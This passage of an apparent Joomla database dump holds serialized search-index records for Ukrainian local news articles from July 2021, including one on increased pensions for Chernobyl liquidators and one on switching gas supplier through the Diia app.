'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2525\";s:5:\"alias\";s:35:\"do-vidoma-pensioneriv-chornobiltsiv\";s:7:\"summary\";s:1525:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/pensia.jpg\"><img src=\"https://malehus.in.ua/images/stories/pensia.jpg\" alt=\"\" class=\"fr-fil fr-dii\" width=\"314\"></a>В Україні частково набрав чинності закон, що передбачає підвищення пенсій для чорнобильців. Повністю він набере чинності з 1 січня 2022 року.</p><p>Документ вчора опублікували у виданні \"Голос України\".</p><p>Ряд його положень набрали чинності з 1 липня:</p><p>-положення про мінімальні розміри пенсії по інвалідності, що настала внаслідок каліцтва чи захворювання;</p><p>-пенсії у зв\'язку з втратою годувальника внаслідок Чорнобильської катастрофи;</p><p>-введення державної адресної допомоги до пенсії.</p><p>Із закону випливає, що додаткова пенсія за шкоду, заподіяну здоров\'ю, та щомісячна компенсація сім\'ям за втрату годувальника внаслідок Чорнобильської катастрофи, виплачується повністю і не залежить від зарплати, інших пенсій чи інших доходів.\";s:4:\"body\";s:2039:\"</p><p>У документі прописано, що для нарахування певного розміру пенсії українцям, які пропрацювали на територіях радіоактивного забруднення, будуть виходити з різних формул:</p><p>-менш як 12 місяців - зарплата визначається за формулою: зарплата за ці місяці ділиться на число відпрацьованих місяців;</p><p>-не менше 30 календарних днів у двох місяцях - зарплата визначається за будь-які фактичні відпрацьовані 30 календарних днів роботи;</p><p>-менш як місяць - зарплата визначається за один календарний місяць з додаванням до заробітної плати на основній роботі.</p><p>Українцям, які брали безпосередню участь у ліквідації інших ядерних аварій та їх наслідків, у ядерних випробуваннях, у військових навчаннях із застосуванням ядерної зброї і внаслідок цього стали особами з інвалідністю, надали право на держпенсію у розмірі п\'ятикратного розміру від розміру мінімальної зарплати, встановленої на 1 січня відповідного року.Так, виплати для \"чорнобильців\", які отримали в результаті аварії на ЧАЕС інвалідність, складуть:</p><p>-для першої групи - 16 080 гривень,</p><p>-для другої групи - 12 987 гривень,</p><p>-для третьої групи - 8 917 гривень.</p>\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-07-02 12:29:58\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"8\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:40:\"2525:do-vidoma-pensioneriv-chornobiltsiv\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:52:\"/8-novini-2/2525-do-vidoma-pensioneriv-chornobiltsiv\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2525\";s:5:\"route\";s:93:\"index.php?option=com_content&view=article&id=2525:do-vidoma-pensioneriv-chornobiltsiv&catid=8\";s:5:\"title\";s:65:\"До відома пенсіонерів чорнобильців\";s:11:\"description\";s:1311:\" В Україні частково набрав чинності закон, що передбачає підвищення пенсій для чорнобильців. Повністю він набере чинності з 1 січня 2022 року. Документ вчора опублікували у виданні \"Голос України\". Ряд його положень набрали чинності з 1 липня: -положення про мінімальні розміри пенсії по інвалідності, що настала внаслідок каліцтва чи захворювання; -пенсії у зв\'язку з втратою годувальника внаслідок Чорнобильської катастрофи; -введення державної адресної допомоги до пенсії. Із закону випливає, що додаткова пенсія за шкоду, заподіяну здоров\'ю, та щомісячна компенсація сім\'ям за втрату годувальника внаслідок Чорнобильської катастрофи, виплачується повністю і не залежить від зарплати, інших пенсій чи інших доходів.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-07-02 12:21:09\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-07-02 12:21:09\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4918,'index.php?option=com_content&view=article&id=2526','index.php?option=com_content&view=article&id=2526:09-lipnya-2021-kudi-dali&catid=8','09 липня 2021 - куди далі?',' ','2021-07-09 16:26:34','babd95344c109e321420c260e8349c8d',1,1,1,'*','2021-07-09 13:26:34','0000-00-00 00:00:00','2021-07-09 13:26:34','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2526\";s:5:\"alias\";s:24:\"09-lipnya-2021-kudi-dali\";s:7:\"summary\";s:165:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/a95.jpg\"><img src=\"https://malehus.in.ua/images/stories/a95.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></a></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-07-09 13:26:34\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:29:\"2526:09-lipnya-2021-kudi-dali\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:41:\"/8-novini-2/2526-09-lipnya-2021-kudi-dali\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2526\";s:5:\"route\";s:82:\"index.php?option=com_content&view=article&id=2526:09-lipnya-2021-kudi-dali&catid=8\";s:5:\"title\";s:39:\"09 липня 2021 - куди далі?\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-07-09 13:26:34\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-07-09 13:26:34\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4924,'index.php?option=com_content&view=article&id=2527','index.php?option=com_content&view=article&id=2527:entoni-gopkins-ne-tilki-aktor-svitovogo-rivnya-ale-j-avtor-shikarnogo-valsu&catid=8','Ентоні Гопкінс не тільки актор світового рівня, але й автор шикарного вальсу',' ','2021-07-09 22:33:25','2a538c6ff57b6b5259917c812cf983ad',1,1,1,'*','2021-07-09 19:30:46','0000-00-00 00:00:00','2021-07-09 19:30:46','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2527\";s:5:\"alias\";s:75:\"entoni-gopkins-ne-tilki-aktor-svitovogo-rivnya-ale-j-avtor-shikarnogo-valsu\";s:7:\"summary\";s:501:\"	<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/entony.jpg\"><img alt=\"\" class=\"fr-dii fr-fin\" src=\"https://malehus.in.ua/images/stories/entony.jpg\"></a></p><p><br><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/1LGVGekPSzo\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-07-09 19:33:25\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"6\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:80:\"2527:entoni-gopkins-ne-tilki-aktor-svitovogo-rivnya-ale-j-avtor-shikarnogo-valsu\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:92:\"/8-novini-2/2527-entoni-gopkins-ne-tilki-aktor-svitovogo-rivnya-ale-j-avtor-shikarnogo-valsu\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2527\";s:5:\"route\";s:133:\"index.php?option=com_content&view=article&id=2527:entoni-gopkins-ne-tilki-aktor-svitovogo-rivnya-ale-j-avtor-shikarnogo-valsu&catid=8\";s:5:\"title\";s:140:\"Ентоні Гопкінс не тільки актор світового рівня, але й автор шикарного вальсу\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-07-09 19:30:46\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-07-09 19:30:46\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4927,'index.php?option=com_content&view=article&id=2528','index.php?option=com_content&view=article&id=2528:zminiti-postachalnika-gazu-teper-mozhna-cherez-diyu&catid=8','Змінити постачальника газу тепер можна через «Дію»',' Приєднатися до державного постачальника газу – ГК «Нафтогаз України» – тепер можна через застосунок «Дія». Таким чином, вибір оптимального тарифного пакету для купівлі газу і оформлення заявки на приєднання займе всього кілька хвилин. Як швидко та зручно стати клієнтом Газопостачальної компанії «Нафтогаз України» через «Дію»? Покрокова інструкція. 1. Перейдіть на офіційний сайт ГК «Нафтогаз України» gas.ua у розділ «Стати нашим клієнтом»; 2. Оберіть варіант подачі заявки «Сайт» та натисніть «Подати заявку»; 3. Серед запропонованих способів заповнення заявки оберіть Дію; Система запропонує вам обрати один із двох документів — ID-картку або РНОКПП (раніше — ІПН, індивідуальний податковий номер). Оберіть саме той документ, який додано та верифіковано у вашому застосунку Дія, та відскануйте запропонований QR-код (якщо ж ви заповнюєте заявку у мобільній версії сайту, просто натисніть на QR-код на екрані); 4. Далі на вашому смартфоні потрібно підтвердити передачу 